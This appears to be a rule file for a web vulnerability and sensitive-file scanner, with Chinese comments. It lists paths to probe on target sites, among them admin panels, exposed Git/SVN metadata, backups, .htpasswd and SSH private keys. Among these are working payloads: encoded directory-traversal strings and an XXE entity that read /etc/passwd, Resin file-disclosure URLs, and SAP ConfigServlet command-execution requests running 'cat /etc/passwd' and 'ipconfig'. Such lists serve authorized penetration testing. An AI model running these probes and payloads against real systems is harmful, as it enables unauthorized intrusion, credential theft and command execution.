#是否保存主域名 例如:8080没有扫描结果 http:/url:8080即可以加上
/

# SVN and Git
/.svn/entries	{status=200}
/.git/config	{status=200}
/.git/index	{status=200}
/.git/HEAD	{status=200}
/CVS/Root	{status=200}

# Admin Panel
/admin
/config 
/manage
/manager 
/backup
/home
/backend
/administrator
/admin-console
/admin-control
/control          
/houtai
/back  
/Console
/console
/ControlPanel    
/server-status     
/server-info     
/api               
/app-admin         
/app/config/database.yml	{tag="assword"}    
/cgi-admin         
/cms-admin         
/solr/admin/	{tag="Schema Browser"} {status=200}


/conf     
/test     
/cache   
/cms     


# Web Editors
/edit
/editor
/ewebeditor/
/editor/ewebeditor/
/editor/FCKeditor/
/edit/
/ckfinder/
/fckeditor                  
/plugins/editors/fckeditor     
/plugins/fckeditor           


# Tomcat Examples
/examples          
/examples/servlets/servlet/SessionExample	{status=200} 
/manager/html       


# Database
/db/
/data/	   
/database 
/sqladm     
/sql       
/SQL       
/sqladmin  
/mysql
/MySQL/    
/sqlnet.log	{status=200}       
/data/user.txt	{status=200}       
/user.txt	{status=200}   

/access.log	{status=200}	    
/error.log	{status=200}     
/errors.log	{status=200}     
/debug.log	{status=200}     
/.bash_history	{status=200}     
/.bash_history.php	{status=200}        
/.bashrc	{status=200}     
/.cvsignore	{status=200}     
/.DS_Store	{status=200}     
/.history	{status=200}     
/.htaccess	{status=200}     
/htaccess.bak	{status=200}     
/htaccess.txt	{status=200}     
/.htpasswd	{status=200}    
/.htpasswd.bak	{status=200}     
/nohup.out	{status=200}     
/.idea/workspace.xml	{status=200}    {tag="xml"}
/.mysql_history	{status=200}    
/.old	{status=200}    
/.passwd	{status=200}    
/.ssh	{status=200}    
/httpd.conf	{status=200}
/id_dsa	{status=200}
/Web.config	{status=200}
/config/config.ini	{status=200}

# Directory traversal
..\..\..\..\..\..\..\..\..\..\/windows/win.ini	{tag="files"}
/../../../../../../../../../../../../../etc/passwd	{tag="root:x:"}
//../../../../../../../../../../../../../etc/passwd 	tag="root:x:"}
/../../../../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1	{tag="GATEWAY="}
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd	{tag="root:x:"}
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd	{tag="root:x:"}
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd	{tag="root:x:"}
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd	{tag="root:x:"}
//././././././././././././././././././././././././../../../../../../../../etc/passwd	{tag="root:x:"}
/etc/passwd	{tag="root:x:"}
/etc/hosts	{tag="localhost"}

/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd	{tag="root:x:"}
/resin-doc/tutorial/jndi-appconfig/test?inputFile=/etc/passwd	{tag="root:x:"}
/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp	{tag="This is the default start page for the Resin server"}
/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/web.xml	{tag="WEB-INF/web.xml"}	{status=200}
/ubsiServlet?xml=<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><ubsi service="service" method="method"><object type="Integer">%26xxe;</object></ubsi>	{tag="root:x:"}

/admin.zip	{status=200}    
/admin.rar	{status=200}    
/admin.tar.gz	{status=200}    
/admin.tar.bz2	{status=200}    
/admin.tgz	{status=200}    

/backup.zip	{status=200}    
/backup.rar	{status=200}    
/backup.tar.gz	{status=200}    
/backup.tgz	{status=200}    
/back.tar.bz2	{status=200}    

/db.zip	{status=200}    
/db.rar	{status=200}    
/db.tar.gz	{status=200}    
/db.tgz	{status=200}    
/db.tar.bz2	{status=200}    
/db.log	{status=200}    
/db.inc	{status=200}	
/db.sqlite	{status=200}    

/data.zip	{status=200}    
/data.rar	{status=200}    
/data.tar.gz	{status=200}    
/data.tgz	{status=200}    
/data.tar.bz2	{status=200}    

/database.zip	{status=200}    
/database.rar	{status=200}    
/database.tar.gz	{status=200}    
/database.tgz	{status=200}    
/database.tar.bz2	{status=200}    

/ftp.zip	{status=200}    
/ftp.rar	{status=200}    
/ftp.tar.gz	{status=200}    
/ftp.tgz	{status=200}    
/ftp.tar.bz2	{status=200}    

/log.txt	{status=200}    
/log.tar.gz	{status=200}    
/log.rar	{status=200}    
/log.zip	{status=200}    
/log.tgz	{status=200}    
/log.tar.bz2	{status=200}    

/web.zip	{status=200}    
/web.rar	{status=200}    
/web.tar.gz	{status=200}    
/web.tgz	{status=200}    
/web.tar.bz2	{status=200}    

/www.log	{status=200}    
/www.zip	{status=200}    
/www.rar	{status=200}    
/www.tar.gz	{status=200}    
/www.tgz	{status=200}    
/www.tar.bz2	{status=200}    

/wwwroot.zip	{status=200}    
/wwwroot.rar	{status=200}    
/wwwroot.tar.gz	{status=200}    
/wwwroot.tgz	{status=200}    
/wwwroot.tar.bz2	{status=200}    

/sql.log	{status=200}     
/sql.zip	{status=200}     
/sql.rar	{status=200}     
/sql.tar.gz	{status=200}     
/sql.tgz	{status=200}     
/sql.tar.bz2	{status=200}     
/sql.inc	{status=200} 

# 
/.ssh/id_rsa	{status=200}
/.ssh/id_rsa.pub	{status=200}
/.ssh/authorized_keys	{status=200}
/.ssh/known_hosts	{status=200}
/owa/
/readme	{status=200}
/README	{status=200}
/readme.html	{status=200}
/test.html	{status=200}
/test2.html	{status=200}
/_search?preety	{status=200}
/changelog.txt	{status=200}      
/CHANGELOG.txt	{status=200}      
/CHANGELOG.TXT	{status=200}      
/info.txt	{status=200}      
/install.log	{status=200}      
/install.txt	{status=200}      
/INSTALL.TXT	{status=200}       
/configuration.ini	{status=200}         
/database.csv	{status=200}	
/database.inc	{status=200}      
/database.log	{status=200}      
/fantastico_fileslist.txt	{status=200}     
/global.asa.bak	{status=200}
/invoker/JMXInvokerServlet	{status=200}
/j_security_check	{status=200}
/license.txt	{status=200}    
/logfile	{status=200}
/logfiles	{status=200}
/passwd.txt	{status=200}
/password.txt	{status=200}    
/robots.txt	{status=200}    
/sftp-config.json	{status=200}	{tag="password"}

/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat /etc/passwd	{tag="root:x:"}
/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe /c ipconfig /all	{tag="Configuration"}	{status=200}

#可能有用的文件
/安装.txt	{status=200}
/说明.txt	{status=200}
/新建文本文档.txt	{status=200}
/install/
/minstall/
/ftp/
/forum
/uploadify

#一些敏感的dir文件
